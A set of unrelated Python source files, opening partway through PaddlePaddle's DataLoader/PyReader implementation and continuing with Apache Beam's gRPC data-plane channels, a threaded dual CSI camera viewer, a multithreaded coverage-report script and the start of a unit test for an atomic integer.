def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
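        # Feed variables with a non-zero LoD level cannot be stacked into dense
        # tensors directly, so fall back to the sample-list path; otherwise batch
        # the samples into tensors on the CPU via BatchedTensorProvider.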
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
                logging.info(
                    'places would be omitted when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
            If use_double_buffer=True, PyReader prefetches the next
            batch asynchronously, which speeds up data feeding at the cost
            of a little more CPU or GPU memory, i.e., the memory of one
            batch of input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
            the name of each fed variable. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
           inserted into the program. The user should call :code:`start()`
           before each epoch and catch :code:`fluid.core.EOFException`
           thrown by :code:`Executor.run()` when the epoch ends. Once the
           exception is caught, the user should call :code:`reset()` to reset
           the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
        2. If iterable=True, the created PyReader object is decoupled from
           the program. No operator would be inserted into the program.
           In this case, the created reader is a Python generator, which
           is iterable. The user should feed the data yielded by the PyReader
           object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
data_plane.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Implementation of ``DataChannel``s to communicate across the data plane."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import collections
import logging
import queue
import sys
import threading
from builtins import object
from builtins import range
import grpc
from future.utils import raise_
from future.utils import with_metaclass
from apache_beam.coders import coder_impl
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.worker_id_interceptor import WorkerIdInterceptor
# This module is experimental. No backwards-compatibility guarantees.
_DEFAULT_FLUSH_THRESHOLD = 10 << 20 # 10MB
class ClosableOutputStream(type(coder_impl.create_OutputStream())):
"""A Outputstream for use with CoderImpls that has a close() method."""
def __init__(self,
close_callback=None,
flush_callback=None,
flush_threshold=_DEFAULT_FLUSH_THRESHOLD):
super(ClosableOutputStream, self).__init__()
self._close_callback = close_callback
self._flush_callback = flush_callback
self._flush_threshold = flush_threshold
# This must be called explicitly to avoid flushing partial elements.
def maybe_flush(self):
if self._flush_callback and self.size() > self._flush_threshold:
self._flush_callback(self.get())
self._clear()
def close(self):
if self._close_callback:
self._close_callback(self.get())
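# Minimal usage sketch (illustrative only): how the flush and close callbacks of
# ClosableOutputStream are typically wired. The byte payload and the 16-byte
# threshold below are arbitrary example values, not values used by the runner.
def _example_closable_output_stream():
  chunks = []
  out = ClosableOutputStream(
      close_callback=chunks.append,
      flush_callback=chunks.append,
      flush_threshold=16)
  out.write(b'some encoded elements')
  out.maybe_flush()  # exceeds the 16-byte threshold, so the buffer is flushed
  out.close()        # hands whatever remains (here nothing) to the close callback
  return chunks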
class DataChannel(with_metaclass(abc.ABCMeta, object)):
"""Represents a channel for reading and writing data over the data plane.
Read from this channel with the input_elements method::
for elements_data in data_channel.input_elements(
instruction_id, transform_ids):
[process elements_data]
Write to this channel using the output_stream method::
out1 = data_channel.output_stream(instruction_id, transform_id)
out1.write(...)
out1.close()
When all data for all instructions is written, close the channel::
data_channel.close()
"""
@abc.abstractmethod
def input_elements(
self, instruction_id, expected_transforms, abort_callback=None):
"""Returns an iterable of all Element.Data bundles for instruction_id.
    This iterable terminates only once the full set of data has been received
    for each of the expected transforms. It may block waiting for more data.
Args:
instruction_id: which instruction the results must belong to
expected_transforms: which transforms to wait on for completion
      abort_callback: a callback invoked while blocking that returns whether
        to abort before consuming all the data
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def output_stream(self, instruction_id, transform_id):
"""Returns an output stream writing elements to transform_id.
Args:
instruction_id: which instruction this stream belongs to
transform_id: the transform_id of the returned stream
"""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Closes this channel, indicating that all data has been written.
Data can continue to be read.
    If this channel is shared by many instructions, it should only be called
    on worker shutdown.
"""
raise NotImplementedError(type(self))
class InMemoryDataChannel(DataChannel):
"""An in-memory implementation of a DataChannel.
This channel is two-sided. What is written to one side is read by the other.
  The inverse() method returns the other side of an instance.
"""
def __init__(self, inverse=None):
self._inputs = []
self._inverse = inverse or InMemoryDataChannel(self)
def inverse(self):
return self._inverse
def input_elements(self, instruction_id, unused_expected_transforms=None,
abort_callback=None):
other_inputs = []
for data in self._inputs:
if data.instruction_reference == instruction_id:
if data.data:
yield data
else:
other_inputs.append(data)
self._inputs = other_inputs
def output_stream(self, instruction_id, transform_id):
def add_to_inverse_output(data):
self._inverse._inputs.append( # pylint: disable=protected-access
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=data))
return ClosableOutputStream(
add_to_inverse_output, flush_callback=add_to_inverse_output)
def close(self):
pass
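# Minimal usage sketch (illustrative only): data written to one side of an
# InMemoryDataChannel becomes readable from its inverse() side. The instruction
# and transform ids below are arbitrary example values.
def _example_in_memory_data_channel():
  channel = InMemoryDataChannel()
  out = channel.output_stream('instruction-1', 'transform-1')
  out.write(b'payload')  # buffered in the ClosableOutputStream
  out.close()            # delivers the buffered bytes to the inverse side
  for data in channel.inverse().input_elements('instruction-1', ['transform-1']):
    assert data.data == b'payload'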
class _GrpcDataChannel(DataChannel):
"""Base class for implementing a BeamFnData-based DataChannel."""
_WRITES_FINISHED = object()
def __init__(self):
self._to_send = queue.Queue()
self._received = collections.defaultdict(queue.Queue)
self._receive_lock = threading.Lock()
self._reads_finished = threading.Event()
self._closed = False
self._exc_info = None
def close(self):
self._to_send.put(self._WRITES_FINISHED)
self._closed = True
def wait(self, timeout=None):
self._reads_finished.wait(timeout)
def _receiving_queue(self, instruction_id):
with self._receive_lock:
return self._received[instruction_id]
def _clean_receiving_queue(self, instruction_id):
with self._receive_lock:
self._received.pop(instruction_id)
def input_elements(self, instruction_id, expected_transforms,
abort_callback=None):
"""
    Generator to retrieve elements for an instruction_id.
    input_elements should be called only once per instruction_id.
Args:
instruction_id(str): instruction_id for which data is read
expected_transforms(collection): expected transforms
"""
received = self._receiving_queue(instruction_id)
done_transforms = []
abort_callback = abort_callback or (lambda: False)
try:
while len(done_transforms) < len(expected_transforms):
try:
data = received.get(timeout=1)
except queue.Empty:
if self._closed:
raise RuntimeError('Channel closed prematurely.')
if abort_callback():
return
if self._exc_info:
t, v, tb = self._exc_info
raise_(t, v, tb)
else:
if not data.data and data.ptransform_id in expected_transforms:
done_transforms.append(data.ptransform_id)
else:
assert data.ptransform_id not in done_transforms
yield data
finally:
      # Instruction ids are not reusable, so clean up the receiving queue once
      # we are done with an instruction_id.
self._clean_receiving_queue(instruction_id)
def output_stream(self, instruction_id, transform_id):
def add_to_send_queue(data):
if data:
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=data))
def close_callback(data):
add_to_send_queue(data)
# End of stream marker.
self._to_send.put(
beam_fn_api_pb2.Elements.Data(
instruction_reference=instruction_id,
ptransform_id=transform_id,
data=b''))
return ClosableOutputStream(
close_callback, flush_callback=add_to_send_queue)
def _write_outputs(self):
done = False
while not done:
data = [self._to_send.get()]
try:
# Coalesce up to 100 other items.
for _ in range(100):
data.append(self._to_send.get_nowait())
except queue.Empty:
pass
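      # close() enqueues the _WRITES_FINISHED sentinel; drop it and finish after
      # yielding any data gathered before it.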
if data[-1] is self._WRITES_FINISHED:
done = True
data.pop()
if data:
yield beam_fn_api_pb2.Elements(data=data)
def _read_inputs(self, elements_iterator):
# TODO(robertwb): Pushback/throttling to avoid unbounded buffering.
try:
for elements in elements_iterator:
for data in elements.data:
self._receiving_queue(data.instruction_reference).put(data)
except: # pylint: disable=bare-except
if not self._closed:
logging.exception('Failed to read inputs in the data plane.')
self._exc_info = sys.exc_info()
raise
finally:
self._closed = True
self._reads_finished.set()
def set_inputs(self, elements_iterator):
reader = threading.Thread(
target=lambda: self._read_inputs(elements_iterator),
name='read_grpc_client_inputs')
reader.daemon = True
reader.start()
class GrpcClientDataChannel(_GrpcDataChannel):
"""A DataChannel wrapping the client side of a BeamFnData connection."""
def __init__(self, data_stub):
super(GrpcClientDataChannel, self).__init__()
self.set_inputs(data_stub.Data(self._write_outputs()))
class BeamFnDataServicer(beam_fn_api_pb2_grpc.BeamFnDataServicer):
"""Implementation of BeamFnDataServicer for any number of clients"""
def __init__(self):
self._lock = threading.Lock()
self._connections_by_worker_id = collections.defaultdict(
_GrpcDataChannel)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Data(self, elements_iterator, context):
worker_id = dict(context.invocation_metadata()).get('worker_id')
data_conn = self.get_conn_by_worker_id(worker_id)
data_conn.set_inputs(elements_iterator)
for elements in data_conn._write_outputs():
yield elements
class DataChannelFactory(with_metaclass(abc.ABCMeta, object)):
"""An abstract factory for creating ``DataChannel``."""
@abc.abstractmethod
def create_data_channel(self, remote_grpc_port):
"""Returns a ``DataChannel`` from the given RemoteGrpcPort."""
raise NotImplementedError(type(self))
@abc.abstractmethod
def close(self):
"""Close all channels that this factory owns."""
raise NotImplementedError(type(self))
class GrpcClientDataChannelFactory(DataChannelFactory):
"""A factory for ``GrpcClientDataChannel``.
Caches the created channels by ``data descriptor url``.
"""
def __init__(self, credentials=None, worker_id=None):
self._data_channel_cache = {}
self._lock = threading.Lock()
self._credentials = None
self._worker_id = worker_id
if credentials is not None:
logging.info('Using secure channel creds.')
self._credentials = credentials
def create_data_channel(self, remote_grpc_port):
url = remote_grpc_port.api_service_descriptor.url
if url not in self._data_channel_cache:
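      # Double-checked locking: re-test under the lock so that concurrent callers
      # create at most one channel per URL.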
with self._lock:
if url not in self._data_channel_cache:
logging.info('Creating client data channel for %s', url)
# Options to have no limits (-1) on the size of the messages
# received or sent over the data plane. The actual buffer size
# is controlled in a layer above.
channel_options = [("grpc.max_receive_message_length", -1),
("grpc.max_send_message_length", -1)]
grpc_channel = None
if self._credentials is None:
grpc_channel = GRPCChannelFactory.insecure_channel(
url, options=channel_options)
else:
grpc_channel = GRPCChannelFactory.secure_channel(
url, self._credentials, options=channel_options)
# Add workerId to the grpc channel
grpc_channel = grpc.intercept_channel(
grpc_channel, WorkerIdInterceptor(self._worker_id))
self._data_channel_cache[url] = GrpcClientDataChannel(
beam_fn_api_pb2_grpc.BeamFnDataStub(grpc_channel))
return self._data_channel_cache[url]
def close(self):
logging.info('Closing all cached grpc data channels.')
for _, channel in self._data_channel_cache.items():
channel.close()
self._data_channel_cache.clear()
class InMemoryDataChannelFactory(DataChannelFactory):
"""A singleton factory for ``InMemoryDataChannel``."""
def __init__(self, in_memory_data_channel):
self._in_memory_data_channel = in_memory_data_channel
def create_data_channel(self, unused_remote_grpc_port):
return self._in_memory_data_channel
def close(self):
pass
|
CamCSI.py
|
import cv2
import threading
import numpy as np
class CSI_Camera:
def __init__(self, sensor_id):
# Initialize instance variables
# OpenCV video capture element
self.video_capture = None
# The last captured image from the camera
self.frame = None
self.grabbed = False
# The thread where the video capture runs
self.read_thread = None
self.read_lock = threading.Lock()
self.running = False
self.sensor_id = sensor_id
self.gstreamer_pipeline_string = (
"nvarguscamerasrc sensor-id=%d sensor-mode=3 ! "
"video/x-raw(memory:NVMM), width=(int)1640, height=(int)1232, framerate=(fraction)30/1 ! "
"nvvidconv flip-method=0 ! "
"video/x-raw, width=(int)960, height=(int)720, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"%self.sensor_id)
def open(self):
try:
self.video_capture = cv2.VideoCapture(
self.gstreamer_pipeline_string, cv2.CAP_GSTREAMER
)
# Grab the first frame to start the video capturing
self.grabbed, self.frame = self.video_capture.read()
except RuntimeError:
self.video_capture = None
print("Erreur - Impossible d'ouvrir les cameras")
print("Pipeline Gstreamer: " + self.gstreamer_pipeline_string)
def start(self):
if self.running:
print("Le stream est en cours d'execution")
return None
# create a thread to read the camera image
        if self.video_capture is not None:
self.running = True
self.read_thread = threading.Thread(target=self.updateCamera)
self.read_thread.start()
return self
    def stop(self):
        self.running = False
        # Wait for the reader thread to exit
        if self.read_thread is not None:
            self.read_thread.join()
            self.read_thread = None
def updateCamera(self):
# This is the thread to read images from the camera
while self.running:
try:
grabbed, frame = self.video_capture.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
except RuntimeError:
print("Impossible d'acquerir l'image de la camera")
# FIX ME - stop and cleanup thread
# Something bad happened
def read(self):
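        # Return the most recently grabbed frame under the lock; copy it so the
        # caller can modify it without racing the reader thread.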
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
    def release(self):
        if self.video_capture is not None:
            self.video_capture.release()
            self.video_capture = None
        # Now wait for the reader thread to finish
        if self.read_thread is not None:
            self.read_thread.join()
"""
gstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera
Flip the image by setting the flip_method (most common values: 0 and 2)
display_width and display_height determine the size of each camera pane in the window on the screen
Default 1920x1080
"""
def run_cameras():
window_title = "Dual CSI Cameras"
left_camera = CSI_Camera(1)
left_camera.open()
left_camera.start()
right_camera = CSI_Camera(0)
right_camera.open()
right_camera.start()
if left_camera.video_capture.isOpened() and right_camera.video_capture.isOpened():
cv2.namedWindow(window_title, cv2.WINDOW_AUTOSIZE)
try:
while True:
_, left_image = left_camera.read()
_, right_image = right_camera.read()
camera_images = np.hstack((left_image, right_image))
if cv2.getWindowProperty(window_title, cv2.WND_PROP_AUTOSIZE) >= 0:
cv2.imshow(window_title, camera_images)
else:
break
keyCode = cv2.waitKey(10) & 0xFF
if keyCode == 27:
break
finally:
left_camera.stop()
left_camera.release()
right_camera.stop()
right_camera.release()
cv2.destroyAllWindows()
else:
print("Error: Unable to open both cameras")
left_camera.stop()
left_camera.release()
right_camera.stop()
right_camera.release()
if __name__ == "__main__":
run_cameras()
|
pyCov_multithreading.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from xml.etree import ElementTree
import re
import time
import queue
import threading
import os
import json
import sys
taskQueue = queue.Queue()
lock = threading.RLock()
def worker(fun):
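    # Each pool thread blocks on the shared taskQueue and runs fun on every
    # parameter set it receives.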
while True:
temp = taskQueue.get()
fun(temp)
taskQueue.task_done()
def threadPool(threadPoolNum):
threadPool = []
for i in range(threadPoolNum):
        thread = threading.Thread(target=worker, args=(doFun, ))
thread.daemon = True
threadPool.append(thread)
return threadPool
def getPyCovResult(params):
rootPath = params[0]
ut = params[1]
print("ut: %s" % ut)
startTime = int(time.time())
path = '%s/build/pytest/%s' % (rootPath, ut)
os.system('cd %s && coverage combine `ls python-coverage.data.*`' % path)
os.system('cd %s && pwd && coverage xml -i -o python-coverage.xml' % path)
xml_path = '%s/python-coverage.xml' % path
os.system("python %s/tools/analysisPyXml.py %s %s" %
(rootPath, rootPath, ut))
endTime = int(time.time())
print('pyCov Time: %s' % (endTime - startTime))
def doFun(params):
getPyCovResult(params)
def main(rootPath):
"""
1. get gcov file
2. get gcov file not coverageratio = 0
"""
path = '%s/build/pytest' % rootPath
dirs = os.listdir(path)
pool = threadPool(23)
for i in range(pool.__len__()):
pool[i].start()
for ut in dirs:
params = [rootPath, ut]
taskQueue.put(params)
taskQueue.join()
if __name__ == "__main__":
rootPath = sys.argv[1]
main(rootPath)
|
test_utils.py
|
import unittest
import heapq
import random
import threading
from garage.threads import utils
class UtilsTest(unittest.TestCase):
def test_atomic_int(self):
i = utils.AtomicInt()
self.assertEqual(0, i.get_and_add(0))
self.assertEqual(0, i.get_and_add(1))
self.assertEqual(1, i.get_and_add(2))
